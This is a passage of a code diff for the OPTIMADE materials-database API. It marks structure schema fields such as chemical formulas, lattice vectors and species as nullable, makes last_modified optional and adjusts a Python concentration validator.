by the proportions of elements in the structure as a list of floating point numbers.\n - The sum of the numbers MUST be 1.0 (within floating point accuracy)\n\n- **Examples**:\n - `[1.0]`\n - `[0.3333333333333333, 0.2222222222222222, 0.4444444444444444]`\n\n- **Query examples**:\n - Note: Useful filters can be formulated using the set operator syntax for correlated values.\n However, since the values are floating point values, the use of equality comparisons is generally inadvisable.\n - OPTIONAL: a filter that matches structures where approximately 1/3 of the atoms in the structure are the element Al is: `elements:elements_ratios HAS ALL \"Al\":>0.3333, \"Al\":<0.3334`.", + "nullable": true }, "chemical_formula_descriptive": { "title": "Chemical Formula Descriptive", "type": "string", - "description": "The chemical formula for a structure as a string in a form chosen by the API implementation.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The chemical formula is given as a string consisting of properly capitalized element symbols followed by integers or decimal numbers, balanced parentheses, square, and curly brackets `(`,`)`, `[`,`]`, `{`, `}`, commas, the `+`, `-`, `:` and `=` symbols. The parentheses are allowed to be followed by a number. Spaces are allowed anywhere except within chemical symbols. The order of elements and any groupings indicated by parentheses or brackets are chosen freely by the API implementation.\n - The string SHOULD be arithmetically consistent with the element ratios in the `chemical_formula_reduced` property.\n - It is RECOMMENDED, but not mandatory, that symbols, parentheses and brackets, if used, are used with the meanings prescribed by [IUPAC's Nomenclature of Organic Chemistry](https://www.qmul.ac.uk/sbcs/iupac/bibliog/blue.html).\n\n- **Examples**:\n - `\"(H2O)2 Na\"`\n - `\"NaCl\"`\n - `\"CaCO3\"`\n - `\"CCaO3\"`\n - `\"(CH3)3N+ - [CH2]2-OH = Me3N+ - CH2 - CH2OH\"`\n\n- **Query examples**:\n - Note: the free-form nature of this property is likely to make queries on it across different databases inconsistent.\n - A filter that matches an exactly given formula: `chemical_formula_descriptive=\"(H2O)2 Na\"`.\n - A filter that does a partial match: `chemical_formula_descriptive CONTAINS \"H2O\"`." + "description": "The chemical formula for a structure as a string in a form chosen by the API implementation.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The chemical formula is given as a string consisting of properly capitalized element symbols followed by integers or decimal numbers, balanced parentheses, square, and curly brackets `(`,`)`, `[`,`]`, `{`, `}`, commas, the `+`, `-`, `:` and `=` symbols. The parentheses are allowed to be followed by a number. Spaces are allowed anywhere except within chemical symbols. The order of elements and any groupings indicated by parentheses or brackets are chosen freely by the API implementation.\n - The string SHOULD be arithmetically consistent with the element ratios in the `chemical_formula_reduced` property.\n - It is RECOMMENDED, but not mandatory, that symbols, parentheses and brackets, if used, are used with the meanings prescribed by [IUPAC's Nomenclature of Organic Chemistry](https://www.qmul.ac.uk/sbcs/iupac/bibliog/blue.html).\n\n- **Examples**:\n - `\"(H2O)2 Na\"`\n - `\"NaCl\"`\n - `\"CaCO3\"`\n - `\"CCaO3\"`\n - `\"(CH3)3N+ - [CH2]2-OH = Me3N+ - CH2 - CH2OH\"`\n\n- **Query examples**:\n - Note: the free-form nature of this property is likely to make queries on it across different databases inconsistent.\n - A filter that matches an exactly given formula: `chemical_formula_descriptive=\"(H2O)2 Na\"`.\n - A filter that does a partial match: `chemical_formula_descriptive CONTAINS \"H2O\"`.", + "nullable": true }, "chemical_formula_reduced": { "title": "Chemical Formula Reduced", "pattern": "^([A-Z][a-z]?\\d*)*$", "type": "string", - "description": "The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers.\nThe proportion number MUST be omitted if it is 1.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n Intricate queries on formula components are instead suggested to be formulated using set-type filter operators on the multi valued `elements` and `elements_ratios` properties.\n - Element names MUST have proper capitalization (e.g., `\"Si\"`, not `\"SI\"` for \"silicon\").\n - Elements MUST be placed in alphabetical order, followed by their integer chemical proportion number.\n - For structures with no partial occupation, the chemical proportion numbers are the smallest integers for which the chemical proportion is exactly correct.\n - For structures with partial occupation, the chemical proportion numbers are integers that within reasonable approximation indicate the correct chemical proportions. The precise details of how to perform the rounding is chosen by the API implementation.\n - No spaces or separators are allowed.\n\n- **Examples**:\n - `\"H2NaO\"`\n - `\"ClNa\"`\n - `\"CCaO3\"`\n\n- **Query examples**:\n - A filter that matches an exactly given formula is `chemical_formula_reduced=\"H2NaO\"`." + "description": "The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers.\nThe proportion number MUST be omitted if it is 1.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n Intricate queries on formula components are instead suggested to be formulated using set-type filter operators on the multi valued `elements` and `elements_ratios` properties.\n - Element names MUST have proper capitalization (e.g., `\"Si\"`, not `\"SI\"` for \"silicon\").\n - Elements MUST be placed in alphabetical order, followed by their integer chemical proportion number.\n - For structures with no partial occupation, the chemical proportion numbers are the smallest integers for which the chemical proportion is exactly correct.\n - For structures with partial occupation, the chemical proportion numbers are integers that within reasonable approximation indicate the correct chemical proportions. The precise details of how to perform the rounding is chosen by the API implementation.\n - No spaces or separators are allowed.\n\n- **Examples**:\n - `\"H2NaO\"`\n - `\"ClNa\"`\n - `\"CCaO3\"`\n\n- **Query examples**:\n - A filter that matches an exactly given formula is `chemical_formula_reduced=\"H2NaO\"`.", + "nullable": true }, "chemical_formula_hill": { "title": "Chemical Formula Hill", @@ -3064,7 +3070,8 @@ "title": "Chemical Formula Anonymous", "pattern": "^([A-Z][a-z]?\\d*)*$", "type": "string", - "description": "The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... and so on.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n\n- **Examples**:\n - `\"A2B\"`\n - `\"A42B42C16D12E10F9G5\"`\n\n- **Querying**:\n - A filter that matches an exactly given formula is `chemical_formula_anonymous=\"A2B\"`." + "description": "The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... and so on.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n\n- **Examples**:\n - `\"A2B\"`\n - `\"A42B42C16D12E10F9G5\"`\n\n- **Querying**:\n - A filter that matches an exactly given formula is `chemical_formula_anonymous=\"A2B\"`.", + "nullable": true }, "dimension_types": { "title": "Dimension Types", @@ -3074,12 +3081,14 @@ "items": { "$ref": "#/components/schemas/Periodicity" }, - "description": "List of three integers.\nFor each of the three directions indicated by the three lattice vectors (see property `lattice_vectors`), this list indicates if the direction is periodic (value `1`) or non-periodic (value `0`).\nNote: the elements in this list each refer to the direction of the corresponding entry in `lattice_vectors` and *not* the Cartesian x, y, z directions.\n\n- **Type**: list of integers.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - MUST be a list of length 3.\n - Each integer element MUST assume only the value 0 or 1.\n\n- **Examples**:\n - For a molecule: `[0, 0, 0]`\n - For a wire along the direction specified by the third lattice vector: `[0, 0, 1]`\n - For a 2D surface/slab, periodic on the plane defined by the first and third lattice vectors: `[1, 0, 1]`\n - For a bulk 3D system: `[1, 1, 1]`" + "description": "List of three integers.\nFor each of the three directions indicated by the three lattice vectors (see property `lattice_vectors`), this list indicates if the direction is periodic (value `1`) or non-periodic (value `0`).\nNote: the elements in this list each refer to the direction of the corresponding entry in `lattice_vectors` and *not* the Cartesian x, y, z directions.\n\n- **Type**: list of integers.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - MUST be a list of length 3.\n - Each integer element MUST assume only the value 0 or 1.\n\n- **Examples**:\n - For a molecule: `[0, 0, 0]`\n - For a wire along the direction specified by the third lattice vector: `[0, 0, 1]`\n - For a 2D surface/slab, periodic on the plane defined by the first and third lattice vectors: `[1, 0, 1]`\n - For a bulk 3D system: `[1, 1, 1]`", + "nullable": true }, "nperiodic_dimensions": { "title": "Nperiodic Dimensions", "type": "integer", - "description": "An integer specifying the number of periodic dimensions in the structure, equivalent to the number of non-zero entries in `dimension_types`.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The integer value MUST be between 0 and 3 inclusive and MUST be equal to the sum of the items in the `dimension_types` property.\n - This property only reflects the treatment of the lattice vectors provided for the structure, and not any physical interpretation of the dimensionality of its contents.\n\n- **Examples**:\n - `2` should be indicated in cases where `dimension_types` is any of `[1, 1, 0]`, `[1, 0, 1]`, `[0, 1, 1]`.\n\n- **Query examples**:\n - Match only structures with exactly 3 periodic dimensions: `nperiodic_dimensions=3`\n - Match all structures with 2 or fewer periodic dimensions: `nperiodic_dimensions<=2`" + "description": "An integer specifying the number of periodic dimensions in the structure, equivalent to the number of non-zero entries in `dimension_types`.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n - The integer value MUST be between 0 and 3 inclusive and MUST be equal to the sum of the items in the `dimension_types` property.\n - This property only reflects the treatment of the lattice vectors provided for the structure, and not any physical interpretation of the dimensionality of its contents.\n\n- **Examples**:\n - `2` should be indicated in cases where `dimension_types` is any of `[1, 1, 0]`, `[1, 0, 1]`, `[0, 1, 1]`.\n\n- **Query examples**:\n - Match only structures with exactly 3 periodic dimensions: `nperiodic_dimensions=3`\n - Match all structures with 2 or fewer periodic dimensions: `nperiodic_dimensions<=2`", + "nullable": true }, "lattice_vectors": { "title": "Lattice Vectors", @@ -3094,7 +3103,8 @@ "minItems": 3, "maxItems": 3 }, - "description": "The three lattice vectors in Cartesian coordinates, in \u00e5ngstr\u00f6m (\u00c5).\n\n- **Type**: list of list of floats or unknown values.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST be a list of three vectors *a*, *b*, and *c*, where each of the vectors MUST BE a list of the vector's coordinates along the x, y, and z Cartesian coordinates.\n (Therefore, the first index runs over the three lattice vectors and the second index runs over the x, y, z Cartesian coordinates).\n - For databases that do not define an absolute Cartesian system (e.g., only defining the length and angles between vectors), the first lattice vector SHOULD be set along *x* and the second on the *xy*-plane.\n - MUST always contain three vectors of three coordinates each, independently of the elements of property `dimension_types`.\n The vectors SHOULD by convention be chosen so the determinant of the `lattice_vectors` matrix is different from zero.\n The vectors in the non-periodic directions have no significance beyond fulfilling these requirements.\n - The coordinates of the lattice vectors of non-periodic dimensions (i.e., those dimensions for which `dimension_types` is `0`) MAY be given as a list of all `null` values.\n If a lattice vector contains the value `null`, all coordinates of that lattice vector MUST be `null`.\n\n- **Examples**:\n - `[[4.0,0.0,0.0],[0.0,4.0,0.0],[0.0,1.0,4.0]]` represents a cell, where the first vector is `(4, 0, 0)`, i.e., a vector aligned along the `x` axis of length 4 \u00c5; the second vector is `(0, 4, 0)`; and the third vector is `(0, 1, 4)`." + "description": "The three lattice vectors in Cartesian coordinates, in \u00e5ngstr\u00f6m (\u00c5).\n\n- **Type**: list of list of floats or unknown values.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST be a list of three vectors *a*, *b*, and *c*, where each of the vectors MUST BE a list of the vector's coordinates along the x, y, and z Cartesian coordinates.\n (Therefore, the first index runs over the three lattice vectors and the second index runs over the x, y, z Cartesian coordinates).\n - For databases that do not define an absolute Cartesian system (e.g., only defining the length and angles between vectors), the first lattice vector SHOULD be set along *x* and the second on the *xy*-plane.\n - MUST always contain three vectors of three coordinates each, independently of the elements of property `dimension_types`.\n The vectors SHOULD by convention be chosen so the determinant of the `lattice_vectors` matrix is different from zero.\n The vectors in the non-periodic directions have no significance beyond fulfilling these requirements.\n - The coordinates of the lattice vectors of non-periodic dimensions (i.e., those dimensions for which `dimension_types` is `0`) MAY be given as a list of all `null` values.\n If a lattice vector contains the value `null`, all coordinates of that lattice vector MUST be `null`.\n\n- **Examples**:\n - `[[4.0,0.0,0.0],[0.0,4.0,0.0],[0.0,1.0,4.0]]` represents a cell, where the first vector is `(4, 0, 0)`, i.e., a vector aligned along the `x` axis of length 4 \u00c5; the second vector is `(0, 4, 0)`; and the third vector is `(0, 1, 4)`.", + "nullable": true }, "cartesian_site_positions": { "title": "Cartesian Site Positions", @@ -3107,12 +3117,14 @@ "minItems": 3, "maxItems": 3 }, - "description": "Cartesian positions of each site in the structure.\nA site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property.\n\n- **Type**: list of list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - It MUST be a list of length equal to the number of sites in the structure, where every element is a list of the three Cartesian coordinates of a site expressed as float values in the unit angstrom (\u00c5).\n - An entry MAY have multiple sites at the same Cartesian position (for a relevant use of this, see e.g., the property `assemblies`).\n\n- **Examples**:\n - `[[0,0,0],[0,0,2]]` indicates a structure with two sites, one sitting at the origin and one along the (positive) *z*-axis, 2 \u00c5 away from the origin." + "description": "Cartesian positions of each site in the structure.\nA site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property.\n\n- **Type**: list of list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - It MUST be a list of length equal to the number of sites in the structure, where every element is a list of the three Cartesian coordinates of a site expressed as float values in the unit angstrom (\u00c5).\n - An entry MAY have multiple sites at the same Cartesian position (for a relevant use of this, see e.g., the property `assemblies`).\n\n- **Examples**:\n - `[[0,0,0],[0,0,2]]` indicates a structure with two sites, one sitting at the origin and one along the (positive) *z*-axis, 2 \u00c5 away from the origin.", + "nullable": true }, "nsites": { "title": "Nsites", "type": "integer", - "description": "An integer specifying the length of the `cartesian_site_positions` property.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n\n- **Examples**:\n - `42`\n\n- **Query examples**:\n - Match only structures with exactly 4 sites: `nsites=4`\n - Match structures that have between 2 and 7 sites: `nsites>=2 AND nsites<=7`" + "description": "An integer specifying the length of the `cartesian_site_positions` property.\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property with support for all mandatory filter features.\n\n- **Examples**:\n - `42`\n\n- **Query examples**:\n - Match only structures with exactly 4 sites: `nsites=4`\n - Match structures that have between 2 and 7 sites: `nsites>=2 AND nsites<=7`", + "nullable": true }, "species": { "title": "Species", @@ -3120,7 +3132,8 @@ "items": { "$ref": "#/components/schemas/Species" }, - "description": "A list describing the species of the sites of this structure.\nSpecies can represent pure chemical elements, virtual-crystal atoms representing a statistical occupation of a given site by multiple chemical elements, and/or a location to which there are attached atoms, i.e., atoms whose precise location are unknown beyond that they are attached to that position (frequently used to indicate hydrogen atoms attached to another element, e.g., a carbon with three attached hydrogens might represent a methyl group, -CH3).\n\n- **Type**: list of dictionary with keys:\n - `name`: string (REQUIRED)\n - `chemical_symbols`: list of strings (REQUIRED)\n - `concentration`: list of float (REQUIRED)\n - `mass`: float (OPTIONAL)\n - `original_name`: string (OPTIONAL).\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - Each list member MUST be a dictionary with the following keys:\n - **name**: REQUIRED; gives the name of the species; the **name** value MUST be unique in the `species` list;\n - **chemical_symbols**: REQUIRED; MUST be a list of strings of all chemical elements composing this species.\n Each item of the list MUST be one of the following:\n - a valid chemical-element name, or\n - the special value `\"X\"` to represent a non-chemical element, or\n - the special value `\"vacancy\"` to represent that this site has a non-zero probability of having a vacancy (the respective probability is indicated in the `concentration` list, see below).\n\n If any one entry in the `species` list has a `chemical_symbols` list that is longer than 1 element, the correct flag MUST be set in the list `structure_features`.\n\n - **concentration**: REQUIRED; MUST be a list of floats, with same length as `chemical_symbols`.\n The numbers represent the relative concentration of the corresponding chemical symbol in this species.\n The numbers SHOULD sum to one. Cases in which the numbers do not sum to one typically fall only in the following two categories:\n\n - Numerical errors when representing float numbers in fixed precision, e.g. for two chemical symbols with concentrations `1/3` and `2/3`, the concentration might look something like `[0.33333333333, 0.66666666666]`. If the client is aware that the sum is not one because of numerical precision, it can renormalize the values so that the sum is exactly one.\n - Experimental errors in the data present in the database. In this case, it is the responsibility of the client to decide how to process the data.\n\n Note that concentrations are uncorrelated between different sites (even of the same species).\n\n - **attached**: OPTIONAL; if provided MUST be a list of length 1 or more of strings of chemical symbols for the elements attached to this site, or \"X\" for a non-chemical element.\n\n - **nattached**: OPTIONAL; if provided MUST be a list of length 1 or more of integers indicating the number of attached atoms of the kind specified in the value of the `attached` key.\n\n The implementation MUST include either both or none of the `attached` and `nattached` keys, and if they are provided, they MUST be of the same length.\n Furthermore, if they are provided, the `structure_features` property MUST include the string `site_attachments`.\n\n - **mass**: OPTIONAL. If present MUST be a float expressed in a.m.u.\n\n - **original_name**: OPTIONAL. Can be any valid Unicode string, and SHOULD contain (if specified) the name of the species that is used internally in the source database.\n\n Note: With regards to \"source database\", we refer to the immediate source being queried via the OPTIMADE API implementation.\n\n The main use of this field is for source databases that use species names, containing characters that are not allowed (see description of the list property `species_at_sites`).\n\n - For systems that have only species formed by a single chemical symbol, and that have at most one species per chemical symbol, SHOULD use the chemical symbol as species name (e.g., `\"Ti\"` for titanium, `\"O\"` for oxygen, etc.)\n However, note that this is OPTIONAL, and client implementations MUST NOT assume that the key corresponds to a chemical symbol, nor assume that if the species name is a valid chemical symbol, that it represents a species with that chemical symbol.\n This means that a species `{\"name\": \"C\", \"chemical_symbols\": [\"Ti\"], \"concentration\": [1.0]}` is valid and represents a titanium species (and *not* a carbon species).\n - It is NOT RECOMMENDED that a structure includes species that do not have at least one corresponding site.\n\n- **Examples**:\n - `[ {\"name\": \"Ti\", \"chemical_symbols\": [\"Ti\"], \"concentration\": [1.0]} ]`: any site with this species is occupied by a Ti atom.\n - `[ {\"name\": \"Ti\", \"chemical_symbols\": [\"Ti\", \"vacancy\"], \"concentration\": [0.9, 0.1]} ]`: any site with this species is occupied by a Ti atom with 90 % probability, and has a vacancy with 10 % probability.\n - `[ {\"name\": \"BaCa\", \"chemical_symbols\": [\"vacancy\", \"Ba\", \"Ca\"], \"concentration\": [0.05, 0.45, 0.5], \"mass\": 88.5} ]`: any site with this species is occupied by a Ba atom with 45 % probability, a Ca atom with 50 % probability, and by a vacancy with 5 % probability. The mass of this site is (on average) 88.5 a.m.u.\n - `[ {\"name\": \"C12\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"mass\": 12.0} ]`: any site with this species is occupied by a carbon isotope with mass 12.\n - `[ {\"name\": \"C13\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"mass\": 13.0} ]`: any site with this species is occupied by a carbon isotope with mass 13.\n - `[ {\"name\": \"CH3\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"attached\": [\"H\"], \"nattached\": [3]} ]`: any site with this species is occupied by a methyl group, -CH3, which is represented without specifying precise positions of the hydrogen atoms." + "description": "A list describing the species of the sites of this structure.\nSpecies can represent pure chemical elements, virtual-crystal atoms representing a statistical occupation of a given site by multiple chemical elements, and/or a location to which there are attached atoms, i.e., atoms whose precise location are unknown beyond that they are attached to that position (frequently used to indicate hydrogen atoms attached to another element, e.g., a carbon with three attached hydrogens might represent a methyl group, -CH3).\n\n- **Type**: list of dictionary with keys:\n - `name`: string (REQUIRED)\n - `chemical_symbols`: list of strings (REQUIRED)\n - `concentration`: list of float (REQUIRED)\n - `mass`: float (OPTIONAL)\n - `original_name`: string (OPTIONAL).\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - Each list member MUST be a dictionary with the following keys:\n - **name**: REQUIRED; gives the name of the species; the **name** value MUST be unique in the `species` list;\n - **chemical_symbols**: REQUIRED; MUST be a list of strings of all chemical elements composing this species.\n Each item of the list MUST be one of the following:\n - a valid chemical-element name, or\n - the special value `\"X\"` to represent a non-chemical element, or\n - the special value `\"vacancy\"` to represent that this site has a non-zero probability of having a vacancy (the respective probability is indicated in the `concentration` list, see below).\n\n If any one entry in the `species` list has a `chemical_symbols` list that is longer than 1 element, the correct flag MUST be set in the list `structure_features`.\n\n - **concentration**: REQUIRED; MUST be a list of floats, with same length as `chemical_symbols`.\n The numbers represent the relative concentration of the corresponding chemical symbol in this species.\n The numbers SHOULD sum to one. Cases in which the numbers do not sum to one typically fall only in the following two categories:\n\n - Numerical errors when representing float numbers in fixed precision, e.g. for two chemical symbols with concentrations `1/3` and `2/3`, the concentration might look something like `[0.33333333333, 0.66666666666]`. If the client is aware that the sum is not one because of numerical precision, it can renormalize the values so that the sum is exactly one.\n - Experimental errors in the data present in the database. In this case, it is the responsibility of the client to decide how to process the data.\n\n Note that concentrations are uncorrelated between different sites (even of the same species).\n\n - **attached**: OPTIONAL; if provided MUST be a list of length 1 or more of strings of chemical symbols for the elements attached to this site, or \"X\" for a non-chemical element.\n\n - **nattached**: OPTIONAL; if provided MUST be a list of length 1 or more of integers indicating the number of attached atoms of the kind specified in the value of the `attached` key.\n\n The implementation MUST include either both or none of the `attached` and `nattached` keys, and if they are provided, they MUST be of the same length.\n Furthermore, if they are provided, the `structure_features` property MUST include the string `site_attachments`.\n\n - **mass**: OPTIONAL. If present MUST be a float expressed in a.m.u.\n\n - **original_name**: OPTIONAL. Can be any valid Unicode string, and SHOULD contain (if specified) the name of the species that is used internally in the source database.\n\n Note: With regards to \"source database\", we refer to the immediate source being queried via the OPTIMADE API implementation.\n\n The main use of this field is for source databases that use species names, containing characters that are not allowed (see description of the list property `species_at_sites`).\n\n - For systems that have only species formed by a single chemical symbol, and that have at most one species per chemical symbol, SHOULD use the chemical symbol as species name (e.g., `\"Ti\"` for titanium, `\"O\"` for oxygen, etc.)\n However, note that this is OPTIONAL, and client implementations MUST NOT assume that the key corresponds to a chemical symbol, nor assume that if the species name is a valid chemical symbol, that it represents a species with that chemical symbol.\n This means that a species `{\"name\": \"C\", \"chemical_symbols\": [\"Ti\"], \"concentration\": [1.0]}` is valid and represents a titanium species (and *not* a carbon species).\n - It is NOT RECOMMENDED that a structure includes species that do not have at least one corresponding site.\n\n- **Examples**:\n - `[ {\"name\": \"Ti\", \"chemical_symbols\": [\"Ti\"], \"concentration\": [1.0]} ]`: any site with this species is occupied by a Ti atom.\n - `[ {\"name\": \"Ti\", \"chemical_symbols\": [\"Ti\", \"vacancy\"], \"concentration\": [0.9, 0.1]} ]`: any site with this species is occupied by a Ti atom with 90 % probability, and has a vacancy with 10 % probability.\n - `[ {\"name\": \"BaCa\", \"chemical_symbols\": [\"vacancy\", \"Ba\", \"Ca\"], \"concentration\": [0.05, 0.45, 0.5], \"mass\": 88.5} ]`: any site with this species is occupied by a Ba atom with 45 % probability, a Ca atom with 50 % probability, and by a vacancy with 5 % probability. The mass of this site is (on average) 88.5 a.m.u.\n - `[ {\"name\": \"C12\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"mass\": 12.0} ]`: any site with this species is occupied by a carbon isotope with mass 12.\n - `[ {\"name\": \"C13\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"mass\": 13.0} ]`: any site with this species is occupied by a carbon isotope with mass 13.\n - `[ {\"name\": \"CH3\", \"chemical_symbols\": [\"C\"], \"concentration\": [1.0], \"attached\": [\"H\"], \"nattached\": [3]} ]`: any site with this species is occupied by a methyl group, -CH3, which is represented without specifying precise positions of the hydrogen atoms.", + "nullable": true }, "species_at_sites": { "title": "Species At Sites", @@ -3128,7 +3141,8 @@ "items": { "type": "string" }, - "description": "Name of the species at each site (where values for sites are specified with the same order of the property `cartesian_site_positions`).\nThe properties of the species are found in the property `species`.\n\n- **Type**: list of strings.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST have length equal to the number of sites in the structure (first dimension of the list property `cartesian_site_positions`).\n - Each species name mentioned in the `species_at_sites` list MUST be described in the list property `species` (i.e. for each value in the `species_at_sites` list there MUST exist exactly one dictionary in the `species` list with the `name` attribute equal to the corresponding `species_at_sites` value).\n - Each site MUST be associated only to a single species.\n **Note**: However, species can represent mixtures of atoms, and multiple species MAY be defined for the same chemical element.\n This latter case is useful when different atoms of the same type need to be grouped or distinguished, for instance in simulation codes to assign different initial spin states.\n\n- **Examples**:\n - `[\"Ti\",\"O2\"]` indicates that the first site is hosting a species labeled `\"Ti\"` and the second a species labeled `\"O2\"`.\n - `[\"Ac\", \"Ac\", \"Ag\", \"Ir\"]` indicating the first two sites contains the `\"Ac\"` species, while the third and fourth sites contain the `\"Ag\"` and `\"Ir\"` species, respectively." + "description": "Name of the species at each site (where values for sites are specified with the same order of the property `cartesian_site_positions`).\nThe properties of the species are found in the property `species`.\n\n- **Type**: list of strings.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST have length equal to the number of sites in the structure (first dimension of the list property `cartesian_site_positions`).\n - Each species name mentioned in the `species_at_sites` list MUST be described in the list property `species` (i.e. for each value in the `species_at_sites` list there MUST exist exactly one dictionary in the `species` list with the `name` attribute equal to the corresponding `species_at_sites` value).\n - Each site MUST be associated only to a single species.\n **Note**: However, species can represent mixtures of atoms, and multiple species MAY be defined for the same chemical element.\n This latter case is useful when different atoms of the same type need to be grouped or distinguished, for instance in simulation codes to assign different initial spin states.\n\n- **Examples**:\n - `[\"Ti\",\"O2\"]` indicates that the first site is hosting a species labeled `\"Ti\"` and the second a species labeled `\"O2\"`.\n - `[\"Ac\", \"Ac\", \"Ag\", \"Ir\"]` indicating the first two sites contains the `\"Ac\"` species, while the third and fourth sites contain the `\"Ag\"` and `\"Ir\"` species, respectively.", + "nullable": true }, "assemblies": { "title": "Assemblies", diff --git a/optimade/models/entries.py b/optimade/models/entries.py index 9a74189a..f26cc7a8 100644 --- a/optimade/models/entries.py +++ b/optimade/models/entries.py @@ -74,7 +74,7 @@ class EntryResourceAttributes(Attributes): queryable=SupportLevel.MUST, ) - last_modified: datetime = OptimadeField( + last_modified: Optional[datetime] = OptimadeField( ..., description="""Date and time representing when the entry was last modified. diff --git a/optimade/models/structures.py b/optimade/models/structures.py index 82ad7f1c..dc2bebb8 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -1,5 +1,6 @@ # pylint: disable=no-self-argument,line-too-long,no-name-in-module import re +import warnings from enum import IntEnum, Enum from sys import float_info from typing import List, Optional, Union @@ -16,6 +17,7 @@ from optimade.models.utils import ( ANONYMOUS_ELEMENTS, CHEMICAL_FORMULA_REGEXP, ) +from optimade.server.warnings import MissingExpectedField EXTENDED_CHEMICAL_SYMBOLS = CHEMICAL_SYMBOLS + EXTRA_SYMBOLS @@ -143,7 +145,7 @@ Note: With regards to "source database", we refer to the immediate source being @validator("concentration") def validate_concentration(cls, v, values): - if "chemical_symbols" in values: + if values.get("chemical_symbols"): if len(v) != len(values["chemical_symbols"]): raise ValueError( f"Length of concentration ({len(v)}) MUST equal length of chemical_symbols " @@ -242,10 +244,18 @@ The possible reasons for the values not to sum to one are the same as already sp return v +CORRELATED_STRUCTURE_FIELDS = ( + {"dimension_types", "nperiodic_dimensions"}, + {"cartesian_site_positions", "species_at_sites"}, + {"nsites", "cartesian_site_positions"}, + {"species_at_sites", "species"}, 